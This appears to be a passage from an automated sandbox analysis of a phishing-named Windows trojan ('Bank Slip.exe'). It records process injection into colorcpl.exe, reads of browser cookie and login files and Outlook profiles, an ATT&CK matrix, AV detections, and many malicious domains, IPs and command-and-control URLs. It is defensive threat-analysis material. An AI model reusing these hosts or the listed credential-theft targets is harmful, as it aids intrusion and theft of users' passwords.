                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.PO1268931024 - Bank Slip.exe.414e790.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO1268931024 - Bank Slip.exe.5930000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO1268931024 - Bank Slip.exe.5930000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO1268931024 - Bank Slip.exe.414e790.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1781279015.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1770346968.0000000004139000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.PO1268931024 - Bank Slip.exe.414e790.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO1268931024 - Bank Slip.exe.5930000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO1268931024 - Bank Slip.exe.5930000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO1268931024 - Bank Slip.exe.414e790.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1781279015.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1770346968.0000000004139000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading
                312
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                121
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism
                1
                Disable or Modify Tools
                LSASS Memory2
                Process Discovery
                Remote Desktop Protocol11
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                41
                Virtualization/Sandbox Evasion
                Security Account Manager41
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares1
                Data from Local System
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Deobfuscate/Decode Files or Information
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism
                Cached Domain Credentials113
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                Software Packing
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1539142 Sample: PO1268931024 - Bank Slip.exe Startdate: 22/10/2024 Architecture: WINDOWS Score: 100 34 xtelify.tech 2->34 36 www.timizoasisey.shop 2->36 38 21 other IPs or domains 2->38 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 7 other signatures 2->48 10 PO1268931024 - Bank Slip.exe 3 2->10         started        signatures3 process4 file5 26 C:\Users\...\PO1268931024 - Bank Slip.exe.log, ASCII 10->26 dropped 58 Injects a PE file into a foreign processes 10->58 14 PO1268931024 - Bank Slip.exe 10->14         started        signatures6 process7 signatures8 60 Maps a DLL or memory area into another process 14->60 17 eiVHpMoiongmS.exe 14->17 injected process9 dnsIp10 28 xtelify.tech 84.32.84.32, 50056, 50057, 50058 NTT-LT-ASLT Lithuania 17->28 30 www.givora.site 162.0.231.203, 49956, 49972, 49987 NAMECHEAP-NETUS Canada 17->30 32 10 other IPs or domains 17->32 40 Found direct / indirect Syscall (likely to bypass EDR) 17->40 21 colorcpl.exe 13 17->21         started        signatures11 process12 signatures13 50 Tries to steal Mail credentials (via file / registry access) 21->50 52 Tries to harvest and steal browser information (history, passwords, etc) 21->52 54 Modifies the context of a thread in another process (thread injection) 21->54 56 2 other signatures 21->56 24 firefox.exe 21->24         started        process14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                PO1268931024 - Bank Slip.exe53%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                PO1268931024 - Bank Slip.exe100%AviraTR/AD.Swotter.eiavs
                PO1268931024 - Bank Slip.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                http://www.fontbureau.com/designersG0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                http://www.fontbureau.com/designers/?0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.fontbureau.com/designers?0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                http://www.fontbureau.com/designers0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.fonts.com0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.fontbureau.com0%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.fontbureau.com/designers80%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.rebel.tienda
                199.59.243.227
                truetrue
                  unknown
                  www.timizoasisey.shop
                  188.114.96.3
                  truetrue
                    unknown
                    xtelify.tech
                    84.32.84.32
                    truetrue
                      unknown
                      jexiz.shop
                      8.210.3.99
                      truetrue
                        unknown
                        7fh27o.vip
                        3.33.130.190
                        truetrue
                          unknown
                          prediksipreman.fyi
                          162.0.215.244
                          truetrue
                            unknown
                            www.ila.beauty
                            13.248.169.48
                            truetrue
                              unknown
                              www.givora.site
                              162.0.231.203
                              truetrue
                                unknown
                                www.college-help.info
                                38.88.82.56
                                truetrue
                                  unknown
                                  owinvip.net
                                  3.33.130.190
                                  truetrue
                                    unknown
                                    ladylawher.org
                                    3.33.130.190
                                    truetrue
                                      unknown
                                      gucciqueen.shop
                                      178.79.184.196
                                      truetrue
                                        unknown
                                        www.meanttobebroken.org
                                        141.193.213.10
                                        truetrue
                                          unknown
                                          www.2925588.com
                                          103.71.154.12
                                          truetrue
                                            unknown
                                            wrl-llc.net
                                            3.33.130.190
                                            truetrue
                                              unknown
                                              www.prediksipreman.fyi
                                              unknown
                                              unknownfalse
                                                unknown
                                                www.7fh27o.vip
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  www.ladylawher.org
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    www.wrl-llc.net
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      www.gucciqueen.shop
                                                      unknown
                                                      unknownfalse
                                                        unknown
                                                        www.jexiz.shop
                                                        unknown
                                                        unknownfalse
                                                          unknown
                                                          www.xtelify.tech
                                                          unknown
                                                          unknownfalse
                                                            unknown
                                                            www.owinvip.net
                                                            unknown
                                                            unknownfalse
                                                              unknown
                                                              NameMaliciousAntivirus DetectionReputation
                                                              http://www.2925588.com/jx6k/true
                                                                unknown
                                                                http://www.timizoasisey.shop/3p0l/true
                                                                  unknown
                                                                  http://www.rebel.tienda/7n9v/true
                                                                    unknown
                                                                    http://www.college-help.info/lk0h/true
                                                                      unknown
                                                                      http://www.xtelify.tech/9dj3/true
                                                                        unknown
                                                                        http://www.7fh27o.vip/l5ty/true
                                                                          unknown
                                                                          http://www.owinvip.net/17h7/true
                                                                            unknown
                                                                            http://www.givora.site/855d/true
                                                                              unknown
                                                                              http://www.meanttobebroken.org/9g6s/true
                                                                                unknown
                                                                                http://www.prediksipreman.fyi/3lre/true
                                                                                  unknown
                                                                                  http://www.jexiz.shop/li8d/true
                                                                                    unknown
                                                                                    http://www.wrl-llc.net/6o8s/true
                                                                                      unknown
                                                                                      http://www.gucciqueen.shop/x3by/true
                                                                                        unknown
                                                                                        http://www.ila.beauty/izfe/true
                                                                                          unknown
                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                          https://duckduckgo.com/chrome_newtabcolorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.fontbureau.com/designersGPO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://duckduckgo.com/ac/?q=colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.fontbureau.com/designers/?PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.founder.com.cn/cn/bThePO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.fontbureau.com/designers?PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.tiro.comPO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.fontbureau.com/designersPO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.goodfont.co.krPO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.sajatypeworks.comPO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.typography.netDPO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://www.google.comeiVHpMoiongmS.exe, 00000004.00000002.4160981089.00000000057E4000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158584230.0000000006904000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://www.founder.com.cn/cn/cThePO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.galapagosdesign.com/staff/dennis.htmPO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refereiVHpMoiongmS.exe, 00000004.00000002.4160981089.000000000500A000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158584230.000000000612A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcolorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://www.galapagosdesign.com/DPleasePO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://www.timizoasisey.shopeiVHpMoiongmS.exe, 00000004.00000002.4162936515.0000000006C50000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://www.fonts.comPO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://www.sandoll.co.krPO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://www.urwpp.deDPleasePO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://www.zhongyicts.com.cnPO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://www.sakkal.comPO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://www.apache.org/licenses/LICENSE-2.0PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://www.fontbureau.comPO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icocolorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://www.ecosia.org/newtab/colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.carterandcone.comlPO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://ac.ecosia.org/autocomplete?q=colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.fontbureau.com/designers/cabarga.htmlNPO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.founder.com.cn/cnPO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.fontbureau.com/designers/frere-user.htmlPO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
